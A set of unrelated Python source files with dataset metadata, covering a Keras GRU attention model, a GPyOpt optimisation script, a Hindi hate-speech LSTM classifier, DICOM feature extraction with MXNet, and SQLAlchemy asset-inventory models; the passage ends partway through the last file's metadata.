MODEL = 'BGRU_GA' import numpy as np from tensorflow import set_random_seed np.random.seed(1234) set_random_seed(12345) import os, pickle from keras import backend as K from keras.utils.generic_utils import get_custom_objects from LossHistory import LossHistory from keras.layers import Dense, Input, Embedding, GRU, Bidirectional, TimeDistributed, concatenate, Dropout, BatchNormalization, Reshape, \ RepeatVector, multiply, Permute from keras.models import Model from granularAtt import Granular_Attention_layer from keras import regularizers from keras.callbacks import EarlyStopping, ModelCheckpoint MAX_NB_WORDS = 100000 MAX_SEQUENCE_LENGTH = 70 EMBEDDING_DIM = 200 POS_EMBEDDING_DIM = 10 MODEL_DIR = './models/' EMBED_DIR = './embedding/' def swish(x): return (K.sigmoid(x) * x) get_custom_objects().update({'swish': Activation(swish)}) def build_model(): pos_input1 = Input(shape=(MAX_SEQUENCE_LENGTH,), dtype='float32', name='pos_input1') word_input = Input(shape=(MAX_SEQUENCE_LENGTH,), dtype='float32', name='aux_input') word_inputE = Embedding(len(word_index) + 1, EMBEDDING_DIM, mask_zero=False, weights=[word_embedding_matrix], input_length=MAX_SEQUENCE_LENGTH)(word_input) pos_input11 = RepeatVector(EMBEDDING_DIM)(pos_input1) pos_input11 = Permute((2, 1))(pos_input11) xx1 = multiply([word_inputE, pos_input11]) x = Dropout(0.5)(xx1) y = Bidirectional(GRU(256, return_sequences=True, activation=swish))(x) att = Granular_Attention_layer()(y) d2 = Dropout(0.5)(att) d2 = BatchNormalization(epsilon=1e-06, mode=0, axis=-1, momentum=0.9, weights=None, beta_initializer='zero', gamma_initializer='one')(d2) main_output = Dense(6, kernel_regularizer=regularizers.l2(0.02), activation='softmax', name='main_output')(d2) model = Model(inputs=[word_input, pos_input1], outputs=main_output) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc']) model.summary() return model def train_model(model, x_train, y_train, x_dev, y_dev): i = 100 dir_model = os.path.join(MODEL_DIR, MODEL) if not os.path.exists(dir_model): os.mkdir(dir_model) filepath = dir_model + "/weights-improvement-{epoch:02d}-{val_acc:.4f}.h5" checkpoint = ModelCheckpoint(filepath, monitor='val_acc', verbose=1) print("The " + str(i) + "-th iteration.") history = LossHistory() model.fit({'aux_input': x_train, 'pos_input1': pos_chem_train}, {'main_output': y_train}, validation_data=([x_dev, pos_chem_dev], y_dev), epochs=i, batch_size=64, verbose=2, callbacks=[history, checkpoint, EarlyStopping(monitor='val_loss', min_delta=0.005, patience=5, verbose=0, mode='min')] )
null
model.py
model.py
py
2,792
python
en
code
null
code-starcoder2
83
[ { "api_name": "numpy.random.seed", "line_number": 5, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 5, "usage_type": "attribute" }, { "api_name": "tensorflow.set_random_seed", "line_number": 6, "usage_type": "call" }, { "api_name": "keras.backend.sigmoid", "line_number": 27, "usage_type": "call" }, { "api_name": "keras.backend", "line_number": 27, "usage_type": "name" }, { "api_name": "keras.utils.generic_utils.get_custom_objects", "line_number": 28, "usage_type": "call" }, { "api_name": "keras.layers.Input", "line_number": 31, "usage_type": "call" }, { "api_name": "keras.layers.Input", "line_number": 33, "usage_type": "call" }, { "api_name": "keras.layers.Embedding", "line_number": 34, "usage_type": "call" }, { "api_name": "keras.layers.RepeatVector", "line_number": 36, "usage_type": "call" }, { "api_name": "keras.layers.Permute", "line_number": 37, "usage_type": "call" }, { "api_name": "keras.layers.multiply", "line_number": 38, "usage_type": "call" }, { "api_name": "keras.layers.Dropout", "line_number": 39, "usage_type": "call" }, { "api_name": "keras.layers.Bidirectional", "line_number": 40, "usage_type": "call" }, { "api_name": "keras.layers.GRU", "line_number": 40, "usage_type": "call" }, { "api_name": "granularAtt.Granular_Attention_layer", "line_number": 41, "usage_type": "call" }, { "api_name": "keras.layers.Dropout", "line_number": 42, "usage_type": "call" }, { "api_name": "keras.layers.BatchNormalization", "line_number": 43, "usage_type": "call" }, { "api_name": "keras.layers.Dense", "line_number": 44, "usage_type": "call" }, { "api_name": "keras.regularizers.l2", "line_number": 44, "usage_type": "call" }, { "api_name": "keras.regularizers", "line_number": 44, "usage_type": "name" }, { "api_name": "keras.models.Model", "line_number": 45, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 52, "usage_type": "call" }, { "api_name": "os.path", "line_number": 52, "usage_type": "attribute" }, { "api_name": "os.path.exists", "line_number": 53, "usage_type": "call" }, { "api_name": "os.path", "line_number": 53, "usage_type": "attribute" }, { "api_name": "os.mkdir", "line_number": 54, "usage_type": "call" }, { "api_name": "keras.callbacks.ModelCheckpoint", "line_number": 56, "usage_type": "call" }, { "api_name": "LossHistory.LossHistory", "line_number": 58, "usage_type": "call" }, { "api_name": "keras.callbacks.EarlyStopping", "line_number": 62, "usage_type": "call" } ]
430825618
from __future__ import print_function from __future__ import division from __future__ import unicode_literals from __future__ import absolute_import from future import standard_library standard_library.install_aliases() import sys import os import os.path import pickle import numpy as np from collections import defaultdict import scipy.io from GPyOpt.methods import BayesianOptimization from problems.define_basic_functions import obj, obj_parallel, define_test_pts np.set_printoptions(threshold=sys.maxint) def obj_val(x): global random_seeds, obj_count, list_sampled_x, list_y, list_cost obj_count += 1 random_seed = random_seeds[obj_count] x = x[0, :] print(x) y_mean, y_std, _, raw_data = obj_parallel(repQL, max_steps, episodeCap, num_policy_checks, checks_per_policy, exp_path, env=env, flag_num=flag_num, random_seed=random_seed, x=x, noise_base=noise_base, noise_rand=noise_rand, maze_num=maze_num, maze_name=maze_name) y_mean = y_mean[-1] list_sampled_x.append(x) list_y.append(y_mean) list_cost.append(max_steps*repQL) return y_mean # ============================================ # # main # # ============================================ # if __name__ == '__main__': argv = sys.argv[1:] ''' python main_gpyopt.py mcf2 EI 0 0 argv[0] prob_name gw10One1, gw10Two1, gw10Two2, gw10Three1; gw20Three1 ky10One it10 pd10 mcf1, mcf2 argv[1] algorithm EI, LCB argv[2] constraint (for ei and lcb) 0, 1 argv[3] sample_num 0,1,2,3,... ''' prob_name = argv[0] env = prob_name[:2] acq = argv[1] constraint = int(argv[2]) sample = int(argv[3]) result_path = './Results_gpyopt_'+prob_name+acq+'/' if not os.path.exists(result_path): os.makedirs(result_path) _test_x, _row_num, _col_num, maze_num, maze_name, noise_base, noise_rand, \ flag_num, maze_size, repQL, s, S, skip, episodeCap = define_test_pts(prob_name) num_policy_checks = 1 checks_per_policy = 1 s_num = int((S-s)/skip) max_steps = S if prob_name in ['gw10One1', 'gw10Two1', 'gw10Two2', 'gw20Three1', 'ky10One', 'it10']: max_iter_ = 100 wid_min = 0.1 wid_max = maze_size*2 domain = [{'name':'var_1', 'type':'continuous', 'domain':(0,maze_size-1), 'dimensionality':1}, {'name':'var_2', 'type':'continuous', 'domain':(0,maze_size-1), 'dimensionality':1}, {'name':'var_3', 'type':'continuous', 'domain':(0,maze_size-1), 'dimensionality':1}, {'name':'var_4', 'type':'continuous', 'domain':(0,maze_size-1), 'dimensionality':1}] # {'name':'var_5', 'type':'continuous', 'domain':(wid_min,wid_max), 'dimensionality':1}, # {'name':'var_6', 'type':'continuous', 'domain':(wid_min,wid_max), 'dimensionality':1}] if constraint: constraints = [ {'name': 'const_1', 'constraint': 'x[:,0] - x[:,2]'}] else: constraints = None elif prob_name in ['mcf2']: max_iter_ = 100 position_min = -1.2 position_max = 0.6 domain = [{'name':'var_1', 'type':'continuous', 'domain':(position_min, position_max), 'dimensionality':1}, {'name':'var_2', 'type':'continuous', 'domain':(position_min, position_max), 'dimensionality':1}] if constraint: constraints = [ {'name': 'const_1', 'constraint': 'x[:,0] - x[:,1]'}] else: constraints = None if env in ['gw', 'ky', 'mc']: is_max, mult = False, -1 # minimize the steps elif env in ['it', 'pd']: is_max, mult = True, 1 # maximize the reward if env in ['mc']: checks_per_policy = 10 initial_design_numdata = 10 exp_path = result_path+'sample'+str(sample)+'/' txt_path = result_path+'sample'+str(sample) np.random.seed(sample) random_seeds = np.random.randint(900, size=(initial_design_numdata+max_iter_)*2) list_sampled_x, list_y, list_cost = [], [], [] X_init, Y_init = None, None max_iter = max_iter_ obj_count = -1 if os.path.isfile(txt_path+'_result.pickle'): with open(txt_path+'_result.pickle', 'rb') as file: f_dict = pickle.load(file) array_sampled_x = f_dict.get('sampled_x') array_y = f_dict.get('observed_y') array_cost = f_dict.get('cost') X_init = array_sampled_x Y_init = np.reshape( np.array(array_y), (-1,1) ) for ind, cost in enumerate(array_cost): list_sampled_x.append(array_sampled_x[ind, :]) list_y.append(array_y[ind]) list_cost.append(array_cost[ind]) max_iter = max_iter_ - len(list_y) obj_count = len(list_y) - 1 myBO = BayesianOptimization(f=obj_val, domain=domain, constraints=constraints, X=X_init, Y=Y_init, initial_design_numdata=initial_design_numdata, initial_design_type='latin', acquisition_type=acq, maximize=is_max) myBO.run_optimization(max_iter=max_iter) myBO.save_report(report_file=txt_path+'_report.txt') myBO.save_evaluations(evaluations_file=txt_path+'_evaluations.txt') myBO.save_models(txt_path+'_models.txt') result = {'sampled_x': np.array(list_sampled_x), 'observed_y': np.array(list_y), 'cost': np.array(list_cost), 'random_seeds': random_seeds} with open(txt_path+'_result.txt', "w") as file: file.write(str(result)) with open(txt_path+'_result.pickle', "wb") as file: pickle.dump(result, file)
null
main_gpyopt.py
main_gpyopt.py
py
5,893
python
en
code
null
code-starcoder2
83
[ { "api_name": "future.standard_library.install_aliases", "line_number": 6, "usage_type": "call" }, { "api_name": "future.standard_library", "line_number": 6, "usage_type": "name" }, { "api_name": "numpy.set_printoptions", "line_number": 16, "usage_type": "call" }, { "api_name": "sys.maxint", "line_number": 16, "usage_type": "attribute" }, { "api_name": "problems.define_basic_functions.obj_parallel", "line_number": 26, "usage_type": "call" }, { "api_name": "sys.argv", "line_number": 42, "usage_type": "attribute" }, { "api_name": "os.path.exists", "line_number": 65, "usage_type": "call" }, { "api_name": "os.path", "line_number": 65, "usage_type": "attribute" }, { "api_name": "os.makedirs", "line_number": 65, "usage_type": "call" }, { "api_name": "problems.define_basic_functions.define_test_pts", "line_number": 68, "usage_type": "call" }, { "api_name": "numpy.random.seed", "line_number": 102, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 102, "usage_type": "attribute" }, { "api_name": "numpy.random.randint", "line_number": 103, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 103, "usage_type": "attribute" }, { "api_name": "os.path.isfile", "line_number": 108, "usage_type": "call" }, { "api_name": "os.path", "line_number": 108, "usage_type": "attribute" }, { "api_name": "pickle.load", "line_number": 109, "usage_type": "call" }, { "api_name": "numpy.reshape", "line_number": 114, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 114, "usage_type": "call" }, { "api_name": "GPyOpt.methods.BayesianOptimization", "line_number": 122, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 132, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 133, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 134, "usage_type": "call" }, { "api_name": "pickle.dump", "line_number": 137, "usage_type": "call" } ]
643699253
# -*- coding: utf-8 -*- """ Created on Wed Mar 31 18:35:41 2021 @author: piyab """ import os #os.chdir("D:/Saarland/NN TI/NNTI_WS2021_Project") import torch import torch.nn as nn from torch.autograd import Variable from torch.nn import functional as F import numpy as np import pandas as pd import TASK_1.py from Task1_word_Embeddings.ipynb import * SEED = 1234 #torch.manual_seed(SEED) #torch.backends.cudnn.deterministic = True #TEXT = data.Field(tokenize = 'spacy', tokenizer_language = 'en_core_web_sm') #LABEL = data.LabelField(dtype = torch.float) df = pd.DataFrame.from_csv("hindi_hatespeech.tsv", sep="\t") X = df['text'] y = df['task_1'] from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33) def preprocessing(input_data): dataset = pd.DataFrame(input_data) dataset['text'] = dataset['text'].str.lower() # data preprocessing dataset['text'] = dataset['text'].map(lambda x: clean_data(x)) # drop empty values dataset = drop_empty_values(df) #building vocabulary sentences, all_words, v = building_vocabulary(df) #Calculating word frequencies frequency_of_words = calculating_word_frequency(all_words) return dataset class Attention(torch.nn.Module): def __init__(self, output_size, hidden_size, vocab_size, embedding_length, weights): super(Attention, self).__init__() self.output_size = output_size self.hidden_size = hidden_size self.vocab_size = vocab_size self.embedding_length = embedding_length self.word_embeddings = nn.Embedding(vocab_size, embedding_length) self.word_embeddings.weights = nn.Parameter(weights, requires_grad=False) self.lstm = nn.LSTM(embedding_length, hidden_size) self.label = nn.Linear(hidden_size, output_size) #self.attn_fc_layer = nn.Linear() def Attention_Net(self, lstm_output, final_state): hidden = final_state.squeeze(0) attn_weights = torch.bmm(lstm_output, hidden.unsqueeze(2)).squeeze(2) soft_attn_weights = F.softmax(attn_weights, 1) new_hidden_state = torch.bmm(lstm_output.transpose(1, 2), soft_attn_weights.unsqueeze(2)).squeeze(2) return new_hidden_state def forward(self, input_sentences, batch_size=None): input = self.word_embeddings(input_sentences) input = input.permute(1, 0, 2) if batch_size is None: h_0 = Variable(torch.zeros(1, self.batch_size, self.hidden_size).cuda()) c_0 = Variable(torch.zeros(1, self.batch_size, self.hidden_size).cuda()) output, (final_hidden_state, final_cell_state) = self.lstm(input, (h_0, c_0)) output = output.permute(1, 0, 2) attn_output = self.Attention_Net(output, final_hidden_state) logits = self.label(attn_output) return logits X_train = preprocessing(X_train) ''' INPUT_DIM = len(v) EMBEDDING_DIM = 100 HIDDEN_DIM = 256 #Size of the hidden_state of the LSTM OUTPUT_DIM = 1 ''' out_w = io.open('embedding_weight_W.tsv', 'w', encoding='utf-8') out_w1 = io.open('embedding_weight_W1.tsv', 'w', encoding='utf-8') weight_w = [] for x in out_w: words = [x for x in line.split(',')] weight_w.append(words) weight_w1 = [] for x in out_w1: words = [x for x in line.split(',')] weight_w1.append(words) model = RNN(INPUT_DIM, EMBEDDING_DIM, HIDDEN_DIM, OUTPUT_DIM)
null
hindi_binary_classifier.py
hindi_binary_classifier.py
py
3,312
python
en
code
null
code-starcoder2
83
[ { "api_name": "pandas.DataFrame.from_csv", "line_number": 29, "usage_type": "call" }, { "api_name": "pandas.DataFrame", "line_number": 29, "usage_type": "attribute" }, { "api_name": "sklearn.model_selection.train_test_split", "line_number": 35, "usage_type": "call" }, { "api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 54, "usage_type": "attribute" }, { "api_name": "torch.nn.Embedding", "line_number": 63, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 63, "usage_type": "name" }, { "api_name": "torch.nn.Parameter", "line_number": 64, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 64, "usage_type": "name" }, { "api_name": "torch.nn.LSTM", "line_number": 65, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 65, "usage_type": "name" }, { "api_name": "torch.nn.Linear", "line_number": 66, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 66, "usage_type": "name" }, { "api_name": "torch.bmm", "line_number": 72, "usage_type": "call" }, { "api_name": "torch.nn.functional.softmax", "line_number": 73, "usage_type": "call" }, { "api_name": "torch.nn.functional", "line_number": 73, "usage_type": "name" }, { "api_name": "torch.bmm", "line_number": 74, "usage_type": "call" }, { "api_name": "torch.autograd.Variable", "line_number": 83, "usage_type": "call" }, { "api_name": "torch.zeros", "line_number": 83, "usage_type": "call" }, { "api_name": "torch.autograd.Variable", "line_number": 84, "usage_type": "call" }, { "api_name": "torch.zeros", "line_number": 84, "usage_type": "call" } ]
410881366
import numpy as np import dicom import glob from matplotlib import pyplot as plt import os import cv2 import mxnet as mx import pandas as pd from sklearn import cross_validation inDir = 'C:/Users/SriPrav/Documents/R/19DSB2017' resnet50Model = inDir + "/input/preModels/resnet-50" Stage1SourceFolder = inDir + "/input/sources/stage2/stage2/*" FeaturesExtraction_numpyFiles = inDir + "/input/sources/stage2/stage2/" FeatureExtraction_Folder = inDir + "/input/FeatureExtraction_00_stg2" def get_extractor(): model = mx.model.FeedForward.load(resnet50Model, 0, ctx=mx.gpu(), numpy_batch_size=1) #model = mx.mod.Module.load('C:/Users/SriPrav/Documents/R/19DSB2017/input/model/resnet-50', 0) fea_symbol = model.symbol.get_internals()["flatten0_output"] feature_extractor = mx.model.FeedForward(ctx=mx.gpu(), symbol=fea_symbol , numpy_batch_size=64, arg_params=model.arg_params, aux_params=model.aux_params, allow_extra_params=True ) return feature_extractor def get_3d_data(path): slices = [dicom.read_file(path + '/' + s) for s in os.listdir(path)] slices.sort(key=lambda x: int(x.InstanceNumber)) return np.stack([s.pixel_array for s in slices]) def get_data_id(path): sample_image = get_3d_data(path) sample_image[sample_image == -2000] = 0 batch = [] cnt = 0 dx = 40 ds = 512 for i in range(0, sample_image.shape[0] - 3, 3): tmp = [] for j in range(3): img = sample_image[i + j] img = 255.0 / np.amax(img) * img img = cv2.equalizeHist(img.astype(np.uint8)) img = img[dx: ds - dx, dx: ds - dx] img = cv2.resize(img, (224, 224)) tmp.append(img) tmp = np.array(tmp) batch.append(np.array(tmp)) batch = np.array(batch) return batch def calc_features(): net = get_extractor() for folder in glob.glob(Stage1SourceFolder): batch = get_data_id(folder) feats = net.predict(batch) print(feats.shape) np.save(folder, feats) if __name__ == '__main__': calc_features() ########################################################################################################## # Move the feature extraction numpy files to features folder ########################################################################################################## import os import shutil files = os.listdir(FeaturesExtraction_numpyFiles) for f in files: if f.endswith('.npy'): shutil.move(os.path.join(FeaturesExtraction_numpyFiles,f), os.path.join(FeatureExtraction_Folder,f))
null
DSB2017/1000.FeatureExtraction_00_stg2.py
1000.FeatureExtraction_00_stg2.py
py
2,869
python
en
code
null
code-starcoder2
83
[ { "api_name": "mxnet.model.FeedForward.load", "line_number": 21, "usage_type": "call" }, { "api_name": "mxnet.model", "line_number": 21, "usage_type": "attribute" }, { "api_name": "mxnet.gpu", "line_number": 21, "usage_type": "call" }, { "api_name": "mxnet.model.FeedForward", "line_number": 24, "usage_type": "call" }, { "api_name": "mxnet.model", "line_number": 24, "usage_type": "attribute" }, { "api_name": "mxnet.gpu", "line_number": 24, "usage_type": "call" }, { "api_name": "dicom.read_file", "line_number": 36, "usage_type": "call" }, { "api_name": "os.listdir", "line_number": 36, "usage_type": "call" }, { "api_name": "numpy.stack", "line_number": 38, "usage_type": "call" }, { "api_name": "numpy.amax", "line_number": 52, "usage_type": "call" }, { "api_name": "cv2.equalizeHist", "line_number": 53, "usage_type": "call" }, { "api_name": "numpy.uint8", "line_number": 53, "usage_type": "attribute" }, { "api_name": "cv2.resize", "line_number": 55, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 58, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 59, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 60, "usage_type": "call" }, { "api_name": "glob.glob", "line_number": 66, "usage_type": "call" }, { "api_name": "numpy.save", "line_number": 70, "usage_type": "call" }, { "api_name": "os.listdir", "line_number": 82, "usage_type": "call" }, { "api_name": "shutil.move", "line_number": 86, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 86, "usage_type": "call" }, { "api_name": "os.path", "line_number": 86, "usage_type": "attribute" } ]
537395572
import os.path from sqlalchemy import Column, Integer, String, Sequence, ForeignKey, DateTime from sqlalchemy.orm import sessionmaker, relationship from sqlalchemy.ext.declarative import declarative_base from .database import Base, engine from . import app import datetime from flask_login import UserMixin class User(Base, UserMixin): __tablename__ = "users" id = Column(Integer, primary_key=True) name = Column(String(128)) email = Column(String(128), unique=True) password = Column(String(128)) class Asset(Base): __tablename__ = 'assets' id = Column(Integer, primary_key = True) barcode = Column(String, nullable = False, unique = True) serial_no = Column(String, nullable = True) capture_date = Column(DateTime, default = datetime.datetime.now) name = Column(String(128), nullable = False) category = Column(Integer, ForeignKey('asset_categories.id'), nullable = True) _type = Column(Integer, ForeignKey('asset_types.id'), nullable = True) _model = Column(Integer, ForeignKey('asset_models.id'), nullable = True) status = Column(Integer, ForeignKey('asset_status.id'), nullable = True) location = Column(Integer, ForeignKey('locations.id'), nullable = True) user = Column(Integer, ForeignKey('people.id'), nullable = True) purchase_price = Column(Integer, nullable = True) value = Column(Integer, nullable = True) supplier = Column(Integer, ForeignKey('suppliers.id'), nullable = True) photo = Column(String, nullable = True) comments = Column(String(256), nullable = True) #Return asset object as dictionary def as_dictionary(self): asset={"id": self.id, "barcode": self.barcode, "serial_no": self.serial_no, "capture_date": self.capture_date, "name": self.name, "category": self.category, "_type": self._type, "_model": self._model, "status": self.status, "location": self.location, "user": self.user, "purchase_price": self.purchase_price, "value": self.value, "supplier": self.supplier, "photo": self.photo, "comments": self.comments } return asset class AssetCategory(Base): __tablename__ = 'asset_categories' id = Column(Integer, primary_key = True) category_name = Column(String(128), nullable = False, unique = True) category_assets = relationship("Asset", backref = "asset_category") def as_dictionary(self): categories = {"id": self.id, "category_name": self.category_name} return categories class AssetType(Base): __tablename__ = 'asset_types' id = Column(Integer, primary_key = True) type_name = Column(String(128), nullable = False, unique = True) type_assets = relationship ("Asset", backref = "asset_type") def as_dictionary(self): _types = {"id": self.id, "type_name": self.type_name} return _types class AssetModel(Base): __tablename__ = 'asset_models' id = Column(Integer, primary_key = True) model_name = Column(String(128), nullable = False, unique = True) model_assets = relationship ("Asset", backref = "asset_model") def as_dictionary(self): _models = {"id": self.id, "model_name": self.model_name} return _models class AssetStatus(Base): __tablename__ = 'asset_status' id = Column(Integer, primary_key = True) status_code = Column(String(64), nullable = False, unique = True) status_name = Column(String(128), nullable = False, unique = True) status_assets = relationship ("Asset", backref = "asset_status") def as_dictionary(self): _statuses ={"id": self.id, "status_code": self.status_code, "status_name": self.status_name } return _statuses class Location(Base): __tablename__ = 'locations' id = Column(Integer, primary_key = True) location_code = Column(String(64), nullable = False, unique = True) location_name = Column(String(128), nullable = False) category = Column(Integer, ForeignKey("location_categories.id"), nullable = True) location_assets = relationship ("Asset", backref = "asset_location") location_people = relationship ("People", backref = "person_location") def as_dictionary(self): _locations ={"id": self.id, "location_code": self.location_code, "location_name": self.location_name, "category": self.category } return _locations class LocationCategory(Base): __tablename__ = 'location_categories' id = Column(Integer, primary_key = True) category_name = Column(String(128), nullable = False, unique = True) category_locations = relationship ("Location", backref = "location_category") def as_dictionary(self): _locations_categories = {"id": self.id, "category_name": self.category_name} return _locations_categories class People(Base): __tablename__ = 'people' id = Column(Integer, primary_key = True) barcode = Column(String(64), nullable = False, unique = True) category = Column(Integer, ForeignKey("people_categories.id"), nullable = False) first_name = Column(String(128), nullable = False) second_name = Column(String(128), nullable = False) designation = Column(String(128), nullable = True) department = Column(Integer, ForeignKey("departments.id"), nullable = False) location = Column(Integer, ForeignKey("locations.id"), nullable = False) phone = Column(Integer, unique = True) email = Column(String(128), unique = True) class PeopleCategory(Base): __tablename__ = 'people_categories' id = Column(Integer, primary_key = True) category_name = Column(String(128), nullable = False, unique = True) category_people = relationship ("People", backref = "person_category") def as_dictionary(self): people_category = {"id": self.id, "category_name": self.category_name} return people_category class Department(Base): __tablename__ = "departments" id = Column(Integer, primary_key = True) department_code = Column(String(64), nullable = True, unique = True) department_name = Column(String(128), nullable = False) department_people = relationship ("People", backref = "person_department") def as_dictionary(self): _departments = {"id": self.id, "department_code": self.department_code, "department_name": self.department_name } return _departments class Supplier(Base): __tablename__ = 'suppliers' id = Column(Integer, primary_key = True) code = Column(String(64), nullable = False, unique = True) category = Column(Integer, ForeignKey("suppliers_category.id"), nullable = False) phone = Column(Integer, nullable = False, unique = True) email = Column(String(128), unique = True) location = Column(Integer, ForeignKey("locations.id"), nullable = False) website = Column(String(128), nullable = True, unique = True) person = Column(Integer, ForeignKey("people.id"), nullable = True) def as_dictionary(self): _suppliers = {"id": self.id, "code": self.code, "category": self.category, "phone": self.phone, "email": self.email, "location": self.location, "website": self.website } return _suppliers class SupplierCategory(Base): __tablename__ = 'suppliers_category' id = Column(Integer, primary_key = True) category_name = Column(String(128), nullable = False, unique = True) category_suppliers = relationship ("Supplier", backref = "supplier_category") def as_dictionary(self): supplier_categories = {"id": self.id, "category_name": self.category_name} return supplier_categories
null
arm/assets_bkup.py
assets_bkup.py
py
7,209
python
en
code
null
code-starcoder2
83
[ { "api_name": "database.Base", "line_number": 13, "usage_type": "name" }, { "api_name": "flask_login.UserMixin", "line_number": 13, "usage_type": "name" }, { "api_name": "sqlalchemy.Column", "line_number": 16, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 16, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 17, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 17, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 18, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 18, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 19, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 19, "usage_type": "call" }, { "api_name": "database.Base", "line_number": 21, "usage_type": "name" }, { "api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 24, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 25, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 25, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 26, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 26, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 27, "usage_type": "call" }, { "api_name": "sqlalchemy.DateTime", "line_number": 27, "usage_type": "argument" }, { "api_name": "datetime.datetime", "line_number": 27, "usage_type": "attribute" }, { "api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 28, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 29, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 29, "usage_type": "argument" }, { "api_name": "sqlalchemy.ForeignKey", "line_number": 29, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 30, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 30, "usage_type": "argument" }, { "api_name": "sqlalchemy.ForeignKey", "line_number": 30, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 31, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 31, "usage_type": "argument" }, { "api_name": "sqlalchemy.ForeignKey", "line_number": 31, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 32, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 32, "usage_type": "argument" }, { "api_name": "sqlalchemy.ForeignKey", "line_number": 32, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 33, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 33, "usage_type": "argument" }, { "api_name": "sqlalchemy.ForeignKey", "line_number": 33, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 34, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 34, "usage_type": "argument" }, { "api_name": "sqlalchemy.ForeignKey", "line_number": 34, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 35, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 35, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 36, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 36, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 37, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 37, "usage_type": "argument" }, { "api_name": "sqlalchemy.ForeignKey", "line_number": 37, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 38, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 38, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 39, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 39, "usage_type": "call" }, { "api_name": "database.Base", "line_number": 53, "usage_type": "name" }, { "api_name": "sqlalchemy.Column", "line_number": 56, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 56, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 57, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 57, "usage_type": "call" }, { "api_name": "sqlalchemy.orm.relationship", "line_number": 58, "usage_type": "call" }, { "api_name": "database.Base", "line_number": 64, "usage_type": "name" }, { "api_name": "sqlalchemy.Column", "line_number": 67, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 67, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 68, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 68, "usage_type": "call" }, { "api_name": "sqlalchemy.orm.relationship", "line_number": 69, "usage_type": "call" }, { "api_name": "database.Base", "line_number": 75, "usage_type": "name" }, { "api_name": "sqlalchemy.Column", "line_number": 78, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 78, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 79, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 79, "usage_type": "call" }, { "api_name": "sqlalchemy.orm.relationship", "line_number": 80, "usage_type": "call" }, { "api_name": "database.Base", "line_number": 86, "usage_type": "name" }, { "api_name": "sqlalchemy.Column", "line_number": 89, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 89, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 90, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 90, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 91, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 91, "usage_type": "call" }, { "api_name": "sqlalchemy.orm.relationship", "line_number": 92, "usage_type": "call" 